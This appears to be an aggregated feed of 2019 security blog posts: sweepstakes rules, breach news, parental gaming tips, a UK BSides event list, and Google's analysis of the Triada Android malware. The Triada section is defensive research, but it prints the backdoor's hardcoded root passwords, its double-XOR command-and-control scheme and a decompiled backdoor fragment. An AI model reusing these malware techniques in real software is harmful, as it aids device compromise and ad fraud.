By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with the prize McAfee Summer Safety #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee Summer Safety #RT2Win Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Summer Safety #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Summer Safety #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of the State of New York, U.S.A.

12. Privacy Policy: 

Personal information obtained in connection with this prize McAfee Summer Safety #RT2Win Sweepstakes will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html.

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after June 10,2019 before June 23, 2019 to the address listed below, Attn: #RT2Win at Summer Safety Sweepstakes. To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2019 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS Pulse, 111 Sutter St., Suiter 850, San Francisco, CA 94104

The post Have Fun in the Sun this Summer with the Summer Safety #RT2Win Sweepstakes! appeared first on McAfee Blogs.

What the AMCA Data Breach Teaches Us About Modern Supply Chain Security

The State of Software Security Volume 9 (SOSS Vol. 9) found that the healthcare industry, with its stringent regulations, received relatively high marks in many of the standard AppSec metrics. According to Veracode scan data, healthcare organizations ranked highest of all industries on OWASP pass rate on latest scan, coming in with a rate just over 55 percent. Our flaw persistence analysis shows that the industry is statistically closing found vulnerabilities far faster than any other sector.

However, the recent American Medical Collection Agency data breach has brought attention to the fact that breaches involving subcontractors and business associates, particularly in the healthcare industry, are on the rise. As both Quest Diagnostics and Laboratory Corporation of America Holdings (LabCorp) have filed 8-Ks with the Security and Exchange Commission (SEC), as many as 11.9 million people may have had their personal and payment information stolen by an unauthorized user.

Earlier this year, Moody’s Investor Service ranked hospitals as one of the sectors most vulnerable to cyberattacks. In a press release, Moody's Managing Director Derek Vadala said, “We view cyber risk as event risk that can have material impact on sectors and individual issuers. Data disclosure and business disruption are the two primary types of cyber event risk that we view as having the potential for material impact on issuers' financial profiles and business prospects.”

Ensuring the security of patient data

Healthcare organizations appear to be doing their part to ensure the safety of their patient and customer data. Recently, the Wall Street Journal’s Melanie Evans and Peter Loftus published a story about how hospitals are asking device makers to let them under the hood of their software to look for flaws and vulnerabilities – and opting out of doing business if they’re not granted access. The article cites how, in 2017, NewYork-Presbyterian dropped plans to buy infusion pumps manufactured by Smiths Group PLC after the Department of Homeland Security issued a warning that hackers could take control of pumps (a fix has since been released).

That same year, many hospitals were forced to cancel appointments and surgeries when their operations were stunted by WannaCry and NotPetya cyberattacks – so it’s no wonder hospitals began enlisting the help of cybersecurity pros, including penetration testers.

Evans and Loftus spoke with corporate counsel at Boston Scientific who noted that negotiations with hospitals are more complicated and drawn out than ever before as a result of cybersecurity demands.

Where is the gap in the modern healthcare supply chain?

Given the sensitivity of the data involved, it’s reasonable for hospitals and healthcare IT companies to be more inquisitive. But it’s not just the healthcare-related technologies that they need to look into.

SOSS Vol. 9 shows that the financial industry, while boasting the largest population of applications under test and with a reputation of maintaining some of the most mature AppSec programs, is struggling to meet AppSec standards. The industry ranks second to last in major verticals examined for OWASP pass rate on latest scan, and based on flaw persistence analysis, it’s leaving flaws to linger longer than other industries do.

In order for hospitals and healthcare organizations to ensure the security of those they care for, they need to be able to trust that the third-party vendors and service providers that they enlist to take payments and process claims are taking the appropriate precautions when it comes to software security.

Awareness begets progress

In 2017, Veracode conducted research with YouGov to better understand how well business leaders understood the cybersecurity risks they are introducing to their company as a result of digital transformation and participation in the global economy. What we found was that awareness was low – even following the Equifax breach that occurred that year. The research showed that only 28 percent of respondents had heard of the attack.

Since then, we’ve seen a number of CEOs and other executives paying the price after a breach. Veracode CTO, EMEA, Paul Farrington, said it best:

“Ultimately, this is merely an extension of expectations on the C-Suite when responding to serious events. If CEOs violate environmental, health, or safety standards, they can be fined, and even jailed in many countries. Perfect security is not possible, but with data about our entire lives now being stored and processed by businesses, it is essential that employees and customers alike are afforded a certain standard of cybersecurity. When such standards aren’t met, there out to be accountability at a senior level.”

As healthcare organizations and hospitals are doing an increased level of due diligence before making a purchase or partnering with third parties, we can expect that other industries are likely to follow suit. Executives will begin to add security to their list of priorities, because it will be demanded by the board in an effort to protect their brand and bottom line.

Give your customers confidence that your software is secure

Given that perfect security isn’t possible, organizations should consider reviewing their software development processes to ensure that security is embedded in each stage. One of the reasons that we created Veracode Verified, which helps your organization prove at a glance that you’ve made security a priority, is to help organizations stay ahead of customer and prospect security concerns and speed up sales cycles – without straining limited security resources. The program provides you with a proven roadmap for maturing your application security program, as well as an attestation letter you can share with customers and prospects.

Curious to learn more about how your organization may benefit from Veracode Verified? Have a look at this infographic to get the details.

Don’t Hesitate When Transforming Your Business

Transformation is a popular buzz word in the tech industry. The market is full of companies promising to be the change your business needs to help it transform into the best player in its category. Many companies that have been around for a decade or more believe they’ve already transformed their business numerous times to keep up with the latest technology trends, while newer companies tend to practice business transformation daily to stay competitive. But is business transformation really needed? The answer is yes! However, transformation is an evolutionary process and won’t happen overnight. Organizations need to think about the future and embrace the fact they need to constantly change and move forward.

Transformation is Continuous

A disruptive and groundbreaking company will continually transform alongside its customers, adopting new applications and policies around the cloud, BYOD and more. As these items evolve, companies are confronted with the challenges and risks of change, including securing new endpoints on devices or in the cloud.

As companies evolve and transform to keep up with the latest IT trends, overlooking the security of company data is a common misstep. A recent study by leading IT analyst firm Frost & Sullivan revealed that 83% of APAC organizations don’t think about cybersecurity while embarking on digital transformation projects. Although 72% of the organizations conduct regular breach assessment to protect themselves against cyberattacks, 55% of them were at risk.

A Plan of Action

Companies are predicted to spend $1.7 trillion on digital transformation by the end of 2019, a 42% increase from 2017, according to IDC. With IT budgets at nearly their highest point, it’s time to rethink your transformation strategy and make security a priority.

The cloud is transforming the enterprise, and as a market leader, McAfee is transforming the way businesses secure data in the cloud. We transform the nature of security itself with SaaS (security-as-a-service) consumption models. By partnering with us, organizations can transform confidently, leveraging security solutions purpose-built with transformation in mind, including those that secure every segment of the cloud and heterogenous device environments. McAfee cloud security solutions extend your security from device to cloud with data visibility, data loss prevention, and advanced threat protection on a platform that supports an open ecosystem. Our goal is to make the most secure environment for your business from device to cloud.

As you start your transformation journey, consider the following questions:

  • How is your organization aligned? What are your organization’s goals?
  • What are the biggest/most important strategic initiatives your company has over the next two to four years?
  • What are your current major IT initiatives? Security initiatives? Cloud initiatives?

Looking to transform your business with McAfee? We’re here to help. Use the resources below for more information.

The post Don’t Hesitate When Transforming Your Business appeared first on McAfee Blogs.

Podcast Two Year Anniversary – The Top 10 Episodes

Two years ago on June 9th, 2017 I released the first episode of Security In Five. Here we are two years later, 500+ episodes recorded and no signs of slowing down. The podcast’s longevity and the energy to keep up the dail episode schedule is all because of the listeners and feedback I have received. […]

The post Podcast Two Year Anniversary – The Top 10 Episodes appeared first on Security In Five.

Study: Fortnite Game Becoming the Preferred Social Network for Kids

According to a study recently released by National Research Group (NRG), the wildly popular video game Fortnite is growing beyond its intended gaming platform into a favored social network where kids go daily to chat, message, and connect.

The study represents the most in-depth study on Fortnite to date and contains essential takeaways for parents trying to keep up with their kids’ social networking habits. According to the NRG study, “Fortnite is the number one service teens are using, and audiences cite its social elements as the primary motivators for playing.”

The popular game now claims more than 250 million users around the world, and for its audience of teens (ages 10-17) who play at least once a week, Fortnite consumes about 25% of their free time, cites NRG adding that “Fortnite presents a more hopeful meta-verse where community, inclusivity, creativity and authentic relationships can thrive.”

Summer gaming 

With school break now upon us, the NRG study is especially useful since screentime tends to jump during summer months. Here are some of the risks Fortnite (and gaming in general) presents and some tips on how to increase privacy and safety for young users who love this community.

Fortnite safety tips 

Activate parental controls. Kids play Fortnite on Xbox One, PlayStation 4, Nintendo Switch, and iOS. Parents can restrict and monitor playing time by going into the Settings tab of each device, its related URL, or app. Another monitoring option for PC, tablets, and mobile devices is monitoring software.

Listen, watch, learn. Sit with your kids and listen to and watch some Fortnite sessions. Who are they playing with? What’s the tone of the conversation? Be vocal about anything that concerns you and coach your child on how to handle conflict, strangers online (look at their friend list), and bullying.

Monitor voice chat. Voice chat is an integral part of Fortnite if you are playing in squads or teams. Without the chat function, players can’t communicate in real-time with other team members. Voice chat is also a significant social element of the game because it allows players to connect and build community with friends anywhere. Therein lies the risk — voice chat also allows kids to play the game with strangers so the risk of inappropriate conversation, cyberbullying, and grooming are all reported realities of Fortnite. Voice chat can be turned off in Settings and should be considered for younger tween users.

Scams, passwords, and tech addiction. When kids are having a blast playing video games, danger is are far from their minds. Talk about the downside so they can continue to play their favorite game in a safe, healthy way. Discuss the scams targeting Fortnite users, the importance of keeping user names and passwords private (and strong), and the reasoning behind gaming screen limits.

Social networks have become inherent to kids’ daily life and an important way to form meaningful peer bonds. With new networks emerging every day such as Fortnite, it’s more important than ever to keep the conversation going with your kids about the genuine risks these fun digital hangouts bring.

The post Study: Fortnite Game Becoming the Preferred Social Network for Kids appeared first on McAfee Blogs.

Weekly Update 142

Weekly Update 142

I made it to the Infosecurity hall of fame! Yesterday was an absolutely unreal experience that was enormously exciting:

But that wasn't all, there was also the European Security Blogger awards a couple of days earlier:

And just a general absolutely jam-packed, non-stop week for both Scott and I. We talk about what we've been up to in London, Scott's weird cert adventures and a couple of massive data breaches back home in Australia. I'm publishing this just before I head off to Oslo so I'll come from there next week solo, then with Scott again the week after from the NDC conference. Until then, here's this week's update:

Weekly Update 142
Weekly Update 142
Weekly Update 142

References

  1. Scott had a cert unexpectedly issued for one of his domains (interesting series of events that led to it, documented in that Twitter thread)
  2. Scott tweeted about a weird security decision by Emirate... and got into "Twitter trouble" (we only ever - ever - see this sort of behaviour online, never in person)
  3. Westpac's PayID was the target of a mass enumeration attack (apparently 100k Aussies had personal data exposed by this "feature")
  4. The Australian National University got seriously pwned (19 years worth of historical data - how much of that did they actually still need?)
  5. I'm sponsored by Varonis this week - watch their DFIR team investigate a cyberattack using their data-centric security stack

Cyber News Rundown: Medical Testing Service Data Breach

Reading Time: ~ 2 min.

Quest Diagnostics Customers Affected by Third-Party Breach

The medical testing organization Quest Diagnostics has fallen victim to a third-party data breach that could affect nearly 12 million of their patients. AMCA, a collections agency that works with Quest Diagnostics, noticed unauthorized access to their systems over an eight-month period from August of last year through March 2019. The majority of data targeted were Social Security Numbers and other financial documents, rather than patient’s health records. The market offers a premium for such data.

Adware Installed by Millions of Android Users

Until recently, there were over 230 apps on the Google Play store that had been compromised by a malicious plugin that forced out-of-app advertisements on unsuspecting victims. Globally, over 440 million individuals have installed at least one of these compromised applications and have been affected by overly-aggressive advertisements. While this SDK has been used legitimately for nearly a year, sometime during 2018 the plugin began performing increasingly malicious behaviors, until other developers caught on and began updating their own applications to remove the plugin. 

Chinese Database Exposes Millions of Records

A database belonging to FMC Consulting, a headhunting firm based in China, was recently found by researchers to be publicly available. Among the records are resumes and personally identifiable information for millions of individuals, as well as company data with thousands of recorded messages and emails. Unfortunately for anyone whose information is contained within this database, in the two weeks since being notified of the breach FMC has yet acknowledge the breach or take steps to secure it.

Restaurant Payment Systems Infected

Customer who’ve patronized either Checkers or Rally’s restaurants in recent months are being urged to monitor their credit cards after the chain announced that they discovered card stealing malware on their internal systems. While not all restaurant locations were affected, the company is still working to determine the extent of the compromised payment card systems and has offered credit monitoring services to customers.

University of Chicago Medicine Server Found Online

Researchers have found a server belonging to University of Chicago Medicine with personal information belonging to more than 1.6 million current and past donors. The data includes names, addresses, and even marital and financial information for each donor. Fortunately, the researcher was quick to inform the university of the unsecured ElasticSearch server and it was taken down within 48 hours.

The post Cyber News Rundown: Medical Testing Service Data Breach appeared first on Webroot Blog.

UK Security BSides, Mark Your Calendar & Don’t Miss Out

BSides conferences are fantastic events for budding cyber and information security novices through to seasoned security professionals to learn, discuss the latest security challenges, network with peers and to make new contacts from across the UK cyber security scene. 
Some BSides conferences are run in tandem with nearby popular mainstream security conferences, but unlike most mainstream security conferences, BSides agendas are more participation driven and are more collaborative focused. Any group of security passionate individuals can organise a BSides event at a city not already covered, under the official Security BSides direction. In recent years, following on from the multi-year success of BSides London, there has been a steady stream of new BSides conferences popping up at the various regions throughout the UK.

Mark Your Calendar & Don't Miss Out
UK BSides events are incredibly popular, they tend to be ticket only events, with tickets often selling out weeks and sometimes months prior to the event. Below lists the current UK Security BSides scene (as of 7th June 2019), so mark your calendar and avoid missing out on these excellent and highly rewarding events.

BSides London
Website:
 https://www.securitybsides.org.uk/
Twitter: @BSidesLondon
Last Event: 5th June 2019
Next Event: TBC (expected June 2020)

Notes: Annually held in since April 2011

BSidesMCR (Manchester)
Website: https://www.bsidesmcr.org.uk/
Twitter: @BSidesMCR
Last Event: 16th Augst 2018
Next Event: 29th August 2019 (tickets on sale soon)
Notes: Annually held in August since 2014

BSides Liverpool
Twitter: @bsideslivrpool
Next Event: Saturday 29th June 2019 (Sold Out)
Past Event: Inaugural event June 2019

BSides Bristol
Twitter: @bsidesbristol
Next Event: 20th June 2019 (Sold Out)
Past Event: Inaugural event June 2019

BSides Cymru (Wales)
Twitter: @BSidesCymru
Next Event: In Cardiff on 28th September 2019
Past Event: Inaugural event September 2019

BSides Scotland
Twitter: @BSidesScot
Next Event: Expected April 2020
Past Event: at Edinburgh on 23rd April 2019
Notes: Annually held since 2017

BSides Belfast
Twitter: @bsidesbelfast
Next Event: TBC
Past Event: 27th September 2018

BSides Leeds
Twitter: @bsidesleeds
Next Event: TBC
Past Event: 25th January 2019 

PHA Family Highlights: Triada



We continue our PHA family highlights series with the Triada family, which was first discovered early in 2016. The main purpose of Triada apps was to install spam apps on a device that displays ads. The creators of Triada collected revenue from the ads displayed by the spam apps. The methods Triada used were complex and unusual for these types of apps. Triada apps started as rooting trojans, but as Google Play Protect strengthened defenses against rooting exploits, Triada apps were forced to adapt, progressing to a system image backdoor. However, thanks to OEM cooperation and our outreach efforts, OEMs prepared system images with security updates that removed the Triada infection.

History of Triada

Triada was first described in a blog post on the Kaspersky Lab website in March 2016 and in a follow-up blog post in June 2016. Back then, it was a rooting trojan that tried to exploit the device and after getting elevated privileges, it performed a host of different actions. To hide these actions from analysts, Triada used a combination of dynamic code loading and additional app installs. The Kaspersky posts detail the code injection technique used by Triada and provide some statistics on infected devices at the time. In this post, we’ll focus on the peculiar encryption routine and the unusual binary files used by Triada.
Triada’s first action was to install a type of superuser (su) binary file. This su binary allowed other apps on the device to use root permissions. The su binary used by Triada required a password, so was unique compared to regular su binary files common with other Linux systems.
The binary accepted two passwords, od2gf04pd9 and ac32dorbdq. This is illustrated in the IDA screenshot below. Depending on which one was provided, the binary either 1) ran the command given as an argument as root or 2) concatenated all of the arguments, ran that concatenation preceded by sh, then ran them as root. Either way, the app had to know the correct password to run the command as root.
This Triada rooting trojan was mainly used to install apps and display ads. This trojan targeted older devices because the rooting exploits didn’t work on newer ones. Therefore, the trojan implemented a weight watching feature to decide if old apps needed to be deleted to make space for new installs.
Weight watching included several steps and attempted to free up space on the device’s user partition and system partition. Using a blacklist and whitelist of apps it first removed all the apps on its blacklist. If more free space was required it would remove all other apps leaving only the apps on the whitelist. This process freed space while ensuring the apps needed for the phone to function properly were not removed.
Every app on the system partition had a number, or weight, associated with it. The weight was a sum of the number of apps installed on the same date as the app in question and the number of apps signed with the same certificate. The apps with the lowest weight were installed in isolation (that is, not on a day that the device system image was created) and weren’t signed by the OEM or weren’t part of a developer bundle. In the weight watching process, these apps were removed first, until enough space was made for the new app.
su binary accepts two passwords
In addition to installing apps that display ads, Triada injected code into four web browsers: AOSP (com.android.browser), 360 Secure (com.qihoo.browser), Cheetah (com.ijinshan.browser_fast), and Oupeng (com.oupeng.browser). The code was injected using the same technique described in our blog post about the Zen PHA family and in previously mentioned Kaspersky blog posts.
The web browser injection was done to overwrite the URLs and substitute ad banners on websites with ads benefiting the Triada authors.
Triada also used a peculiar and complex communication encryption routine. Whenever it had to send a request to the Command and Control (C&C) server, it encrypted the request using two XOR loops with different passwords. Because of XOR rules, if the passwords had the same character in the same position, those characters weren’t encrypted. The encrypted request was saved to a file, which had the same name as its size. Finally, the file was zipped and sent to the C&C server in the POST request body.
The example below illustrates one such request. The yellow bytes are the zip file’s signature of the central directory file header. The red bytes show the uncompressed file size of 0x0952. The blue bytes show the file name length (4) and the name itself (2386, a decimal version of 0x0952).
09 00 00 50 4B 01 02 14 00 14 00 08 00 08 00 4F ...PK..........O
91 F3 48 AE CF 91 D5 B1 04 00 00 52 09 00 00 04 ..H........R....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 32 33 38 36 50 4B 05 06 00 00 00 00 01 00 01 .2386PK.........
00 32 00 00 00 E3 04 00 00 00 00 .2.........
The underlying data protocol changed periodically. It was either a simple JSON, a list of key-value pairs similar to the properties file, or a proprietary format as shown below.
[collect_Head]device=Nexus 5X
[collect_Space]xadevicekey=xxxxx

[collect_Space]collentmod=opappresultmode
[collect_Space]registerUser=true
[collect_End]
When Triada was discovered, we implemented detection that removed Triada samples from all devices with Google Play Protect. This implementation, combined with the increased security on newer Android devices, made it significantly harder for Triada to infect devices.

When rooting doesn’t work…

During the summer of 2017 we noticed a change in new Triada samples. Instead of rooting the device to obtain elevating privileges, Triada evolved to become a pre-installed Android framework backdoor. The changes to Triada included an additional call in the Android framework log function, demonstrated below with a highlighted configuration string.
LABEL+13:
V18 = -1;
LABEL_18:
j___config_log_println(v7, v6, v10, v11, "cf89450001");
if ( v10 )
This backdoored log function version of Triada was first described by Dr.Web in July 2017. The blog post includes a description of Triada code injection methods.
By backdooring the log function, the additional code executes every time the log method is called (that is, every time any app on the phone tries to log something). These log attempts happen many times per second, so the additional code is running non-stop. The additional code also executes in the context of the app logging a message, so Triada can execute code in any app context. The code injection framework in early versions of Triada worked on Android releases prior to Marshmallow.
The main purpose of the backdoor function was to execute code in another app’s context. The backdoor attempts to execute additional code every time the app needs to log something. Triada developers created a new file format, which we called MMD, based on the file header.
The MMD format was an encrypted version of a DEX file, which was then executed in the app context. The encryption algorithm was a double XOR loop with two different passwords. The format is illustrated below.
Each MMD file had a specific file name of the format <MD5 of the process name>36.jmd. By using the MD5 of the process name, the Triada authors tried to obscure the injection target. However, the pool of all available process names is fairly small, so this hash was easily reversible.
We identified two code injection targets: com.android.systemui (the System UI app) and com.android.vending (the Google Play app). The first target was injected to get the GET_REAL_TASKS permission. This is a signature-level permission, which means that it can’t be held by ordinary Android apps.
Starting with Android Lollipop, the getRecentTasks() method is deprecated to protect users' privacy. However, apps holding the GET_REAL_TASKS permission can get the result of this method call. To hold the GET_REAL_TASKS permission, an app has to be signed with a specific certificate, the device’s platform cert, which is held by the OEM. Triada didn’t have access to this cert. Instead it executed additional code in the System UI app, which has the GET_REAL_TASKS permission.
The injected code returned the app running on top (the activity running in the foreground and being actively used by the device user) to other apps on the device. This app was exposed using two methods: an intent or a socket created for this purpose. When an app on the device sent the intent or wrote to a socket created by Triada’s code injection, it received the package name of the app running on top. Triada used the package name to determine if an ad was displayed. The assumption was that if the app running on top was a browser, the user would expect to see some ads, so Triada displayed ads from the background.
The second injection target was the Google Play app. This injection supported five commands and responses to them. The supported commands are shown below in Chinese, a language that was used throughout the Triada app and injection. English translations are given on the right.
  1. 下载请求
  2. 下载结果
  3. 安装请求
  4. 安装结果
  5. 激活请求
  6. 激活结果
  7. 拉活请求
  8. 拉活结果
  9. 卸载请求
  10. 卸载结果
  1. download request
  2. download result
  3. install request
  4. installation result
  5. activation request
  6. activation result
  7. pull request
  8. pull the results
  9. uninstall request
  10. uninstall result
The commands trigger the heartbeat (pull request), download, installation, uninstallation (in the Google Play app context), and activation (the first execution) of the apps. In the Google Play app context, installation meant that Triada didn’t have to turn on installation from unknown sources and all app installs looked like they were from Google Play.
The apps were downloaded from the C&C server and the communication with the C&C was encrypted using the same custom encryption routine using double XOR and zip. The downloaded and installed apps used the package names of unpopular apps available on Google Play. They didn’t have any relation to the apps on Google Play apart from the same package name.
The last piece of the puzzle was the way the backdoor in the log function communicated with the installed apps. This communication prompted the investigation: the change in Triada behavior mentioned at the beginning of this section made it appear that there was another component on the system image. The apps could communicate with the Triada backdoor by logging a line with a specific predefined tag and message.
The reverse communication was more complicated. The backdoor used Java properties to relay a message to the app. These properties were key-value pairs similar to Android system properties, but they were scoped to a specific process. Setting one of these properties in one app context ensures that other apps won’t see this property. Despite that, some versions of Triada indiscriminately created the properties in every single app process.
The diagram below illustrates the communication mechanisms of the Triada backdoor.
Communication mechanisms of Triada

Reverse engineering countermeasures and development

The Triada backdoor was hidden to make the analysis harder. The strings in the Android framework library that related to Triada activities were encrypted, as shown below.
Android framework strings
The strings were encrypted using the algorithm of two XOR loops. However, the first highlighted string, 36.jmd, wasn’t encrypted. This is the MMD file name string mentioned before.
Another anti-analysis measure implemented by the Triada authors was function padding, including additional exported functions that don't serve any purpose apart from making the file size bigger and the function layout more random with every compilation. Four types of these functions are shown in the screenshots below.
Example of function padding
One final interesting feature of Triada worth mentioning is the development cycle. By analyzing subsequent versions of the Triada backdoor (up to 1.5.1) we saw the changes in the code. In the newest version, they substituted MD5 with SHA1. This is used to hash the filenames, which come from a restricted pool of values. The newest version also encrypted the 36.jmd string and introduced changes to the code for compatibility with Android Nougat.
There are also code stubs pointing at the modification of the SystemUI and WebView Android framework elements. We couldn’t find the code that was executed by these modifications, just code stubs suggesting more development in the future.

OEM outreach

Triada infects device system images through a third-party during the production process. Sometimes OEMs want to include features that aren’t part of the Android Open Source Project, such as face unlock. The OEM might partner with a third-party that can develop the desired feature and send the whole system image to that vendor for development.
Based on analysis, we believe that a vendor using the name Yehuo or Blazefire infected the returned system image with Triada.
Production process with malicious party
We coordinated with the affected OEMs to provide system updates and remove traces of Triada. We also scan for Triada and similar threats on all Android devices.
OEMs should ensure that all third-party code is reviewed and can be tracked to its source. Additionally, any functionality added to the system image should only support requested features. It’s a good practice to perform a security review of a system image after adding third-party code.

Summary

Triada was inconspicuously included in the system image as third-party code for additional features requested by the OEMs. This highlights the need for thorough ongoing security reviews of system images before the device is sold to the users as well as any time they get updated over-the-air (OTA).
By working with the OEMs and supplying them with instructions for removing the threat from devices, we reduced the spread of preinstalled Triada variants and removed infections from the devices through the OTA updates.
The Triada case is a good example of how Android malware authors are becoming more adept. This case also shows that it’s harder to infect Android devices, especially if the malware author requires privilege elevation.
We are also performing a security review of system images through the Build Test Suite. You can read more about this program in the Android Security 2018 Year in Review report. Triada indicators of compromise are one of many signatures included in the system image scan. Additionally, Google Play Protect continues to track and remove any known versions of Triada and Triada-related apps it detects from user devices.

Security awareness training: a constant in a changing world

There are two schools of thought when it comes to users and cybersecurity. Some people working in the industry think of users as the weakest link. We prefer to see them as the first line of defence. Cybersecurity training programmes can address staff shortcomings in knowledge, promote positive behaviour and equip non-experts with enough information to be able to spot potential threats or scams.

In our previous post, we looked back through the BH Consulting blog archives to trace the evolution of ransomware. This time, we’ve gone digging for a less technical threat. Instead, it’s a constant challenge for any infosec professional: security awareness.

Training shortfall

Back in April 2014, we reported on a survey which found that just 44 per cent of employees received cybersecurity training. David Monahan, research director with Enterprise Management Associates, summed up the issue perfectly:

“Without training, people will click on links in email and release sensitive information in any number of ways. In most cases they don’t realise what they are doing is wrong until a third-party makes them aware of it. In reality, organisations that fail to train their people are doing their business, their personnel and, quite frankly, the Internet as a whole a disservice because their employees’ not only make poor security decisions at work but also at home on their personal computing devices as well.”

One year later, little had changed. In a post from April 2015, Lee Munson covered a survey by SpectorSoft of 772 IT security professionals. “Not only do many firms have staff who lack even a basic level of security awareness they often, as the report concludes, have poorly trained staff too, with many of the survey respondents citing a lack of expertise as being a significant problem in terms of defending against insider threats.”

Accidents will happen

At least the post acknowledged that damage can sometimes be the result of accidental actions. Too often, security vendors throw around phrases like ‘insider threat’ that, intentionally or not, tar all user actions as malicious.

But could it be that some people are just naturally more susceptible to spilling the beans? Another post from April 2015 reported on a study from Iowa State University that claimed to spot which people are likely to fall for social engineering tricks that cybercriminals often use. It did this by analysing brainwaves. People with low levels of self control were more likely to reveal confidential information like company secrets, the researcher observed.

That’s not, admittedly, an approach many companies could take in practice, but it couldn’t hurt to ask some targeted questions at interview stage.

In June of that year, a UK Government survey found that the number of breaches had increased year on year. The findings also showed that more businesses large and small were providing ongoing security awareness training to their staff compared to the previous year. Despite that, many of the organisations surveyed also saw an increase in staff-related security breaches during the same period.

Must try harder

As Lee Munson wrote: “While budgets and technical controls obviously come into play and affect an organisation’s ability to protect its digital assets, the human aspect still appears to be the area requiring the most work. Staff training and awareness programmes are known to be effective but many companies do not appear to have leveraged them to their full potential.”

Another post put the need for cybersecurity training and awareness squarely into perspective. Security company Proofpoint showed the extent to which attackers aim for an organisation’s human resources rather than its technical defences. Its report found that people still click on 4 per cent of malicious links they find in emails. BH Consulting’s regular blogger Lee Munson found this to be a surprisingly high figure. “Attackers employ psychology to improve the chances of their attacks succeeding,” he wrote.

And if at first you don’t succeed? A post from early in 2016 suggested a radical approach to poor security behaviour: disciplinary measures. The blog quoted a survey by Nuix which determined that human behaviour was the biggest threat to an organisation’s security. It said corporations would tolerate risky behaviour less, and would likely penalise staff who “invite a data breach”. That’s one way to “encourage” people to show better security behaviour.

Communication breakdown

Lee rightly raised the question of whether companies have sufficiently communicated their security policies and procedures in the first place. “So, if companies (including yours) are going to penalise employees for not being up to date on all of their security policies, who is going to police the writing and dissemination of those documents in the first place?”.

The message is that security policies need to be clear, so that even a non-technical member of staff can:

  • Understand them
  • Act on them
  • Remember them.

Taken as a whole, the blogs show that while cybersecurity training is a valuable exercise, it’s got to be delivered in a way that the intended audience will understand.

The post Security awareness training: a constant in a changing world appeared first on BH Consulting.

4 Tips to Protect Your Information During Medical Data Breaches

As the companies we trust with our data become more digital, it’s important for users to realize how this affects their own cybersecurity. Take your medical care provider, for instance. You walk into a doctor’s office and fill out a form on a clipboard. This information is then transferred to a computer where a patient Electronic Health Record is created or added to. We trust that our healthcare provider has taken the proper precautions to safely store this data. Unfortunately, medical data breaches are on the rise with a 70% increase over the past seven years. In fact, medical testing company LabCorp just announced that it experienced a breach affecting approximately 7.7 million customers.

How exactly did this breach occur? The information was exposed as a result of an issue with a third-party billing collections vendor, American Medical Collection Agency (AMCA). The information exposed includes names, addresses, birth dates, balance information, and credit card or bank account information provided by customers to AMCA. This breach comes just a few days after Quest Diagnostics, another company who worked with AMCA, announced that they too experienced a breach affecting 11.9 million users.

Luckily, LabCorp stated that they do not store or maintain Social Security numbers and insurance information for their customers. Additionally, the company provided no ordered test, lab results, or diagnostic information to AMCA. LabCorp stated that they intend to provide 200,000 affected users with more specific information regarding the breach and offer them with identity protection and credit monitoring services for two years. And after receiving information on the possible security compromise, AMCA took down its web payments page and hired an external forensics firm to investigate the situation.

Medical data is essentially nonperishable in nature, making it extremely valuable to cybercrooks. It turns out that quite a few security vulnerabilities exist in the healthcare industry, such as unencrypted traffic between servers, the ability to create admin accounts remotely, and disclosure of private information. These types of vulnerabilities could allow cybercriminals to access healthcare systems, as our McAfee Labs researchers discovered. If someone with malicious intent did access the system, they would have the ability to permanently alter medical images, use medical research data for extortion, and more.

Cybercriminals are constantly pivoting their tactics and changing their targets in order to best complete their schemes. As it turns out, medical data has become a hot commodity for cybercrooks. According to the McAfee Labs Threats Report from March 2018, the healthcare sector has experienced a 210% increase in publicly disclosed security incidents from 2016 to 2017. The McAfee Advanced Threat Research Team concluded that many of the incidents were caused by failures to comply with security best practices or to address vulnerabilities in medical software.

